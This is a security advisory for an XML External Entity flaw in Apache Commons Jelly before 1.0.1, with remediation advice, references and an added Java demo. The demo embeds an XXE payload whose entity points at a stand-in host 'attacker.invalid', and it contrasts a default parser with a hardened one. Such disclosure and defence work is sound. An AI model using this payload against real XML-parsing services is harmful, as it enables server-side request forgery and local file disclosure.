Description
Apache Commons Jelly parses Jelly scripts (XML files) with Apache Xerces. If the script's DOCTYPE declares an external entity with a SYSTEM identifier that points to a URL, and that entity is referenced in the body of the script, the parser attempts to connect to the URL as the script is parsed, because the default parser configuration resolves external entities. An attacker who can supply or modify a Jelly script therefore gets an XML External Entity (XXE) attack in Apache Commons Jelly before 1.0.1: at minimum a server-side request to an attacker-chosen URL, and, depending on how the entity value is used, disclosure of local file contents.
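The following is an added illustration, not code from the page or from the Jelly project. It shows a constructed Jelly script carrying the kind of DOCTYPE described above, parsed once with a default JAXP/Xerces SAX parser (which will try to reach the URL) and once with a parser hardened by the standard Xerces features that disable DOCTYPEs and external entities. The script content, the `attacker.invalid` host, and the class and method names are all assumptions made for the example; the page does not state which of these settings Jelly 1.0.1 itself applies.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class JellyXxeDemo {

    // Constructed Jelly script (an assumption for this example): the DOCTYPE
    // declares an external general entity whose SYSTEM identifier is a URL,
    // and the script body references that entity. A parser that resolves
    // external entities will try to fetch the URL while parsing this text.
    static final String JELLY_SCRIPT =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE script [\n"
      + "  <!ENTITY ext SYSTEM \"http://attacker.invalid/probe\">\n"
      + "]>\n"
      + "<j:jelly xmlns:j=\"jelly:core\">\n"
      + "  <j:set var=\"v\" value=\"&ext;\"/>\n"
      + "</j:jelly>\n";

    // Vulnerable configuration: a default SAXParserFactory. Xerces resolves
    // external general entities by default, so parsing JELLY_SCRIPT triggers
    // an outbound connection to the entity's URL.
    static SAXParser defaultParser() throws Exception {
        return SAXParserFactory.newInstance().newSAXParser();
    }

    // Hardened configuration: reject DOCTYPE declarations outright and, as a
    // second layer, disable external entity and external DTD loading so that
    // even a parser which later permits DOCTYPEs will not fetch anything.
    static SAXParser hardenedParser() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        return f.newSAXParser();
    }

    // Parses the script with the given parser and describes what happened.
    // A network error from the default parser is itself the evidence: the
    // parser tried to open the URL named in the entity declaration.
    static String parse(SAXParser parser, String xml) {
        try {
            parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return "parsed: external entity was resolved (or silently skipped)";
        } catch (SAXParseException e) {
            return "rejected by parser: " + e.getMessage();
        } catch (IOException e) {
            return "attempted to fetch external entity: " + e;
        } catch (Exception e) {
            return "failed: " + e;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("default : " + parse(defaultParser(), JELLY_SCRIPT));
        System.out.println("hardened: " + parse(hardenedParser(), JELLY_SCRIPT));
    }
}
```

With the default parser the run either completes after contacting the URL or fails with a network error such as an unknown host, both of which show the outbound request was made. The hardened parser never reaches the entity: it throws a `SAXParseException` at the DOCTYPE, which is the behaviour you want for any parser fed scripts from an untrusted source.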
Remediation
Upgrade Apache Commons Jelly to 1.0.1 or later, where this issue (JELLY-293) is addressed. Until the upgrade is in place, do not parse Jelly scripts from untrusted sources, and configure any XML parser that handles such scripts to reject DOCTYPE declarations and external entities.
References
https://issues.apache.org/jira/browse/JELLY-293
http://www.securitytracker.com/id/1039444
http://www.securityfocus.com/bid/101052
https://lists.apache.org/thread.html/f1fc3f2c45264af44ce782d54b5908ac95f02bf7ad88bb57bfb04b73%40%3Cdev.commons.apache.org%3E
Related Vulnerabilities
CVE-2021-33036 Vulnerability in maven package org.apache.hadoop:hadoop-yarn-server-common
CVE-2020-2212 Vulnerability in maven package org.jenkins-ci.plugins:github-coverage-reporter
CVE-2019-1003022 Vulnerability in maven package org.jvnet.hudson.plugins:monitoring
CVE-2023-29016 Vulnerability in maven package io.goobi.viewer:viewer-core
CVE-2022-41230 Vulnerability in maven package org.jenkins-ci.plugins:build-publisher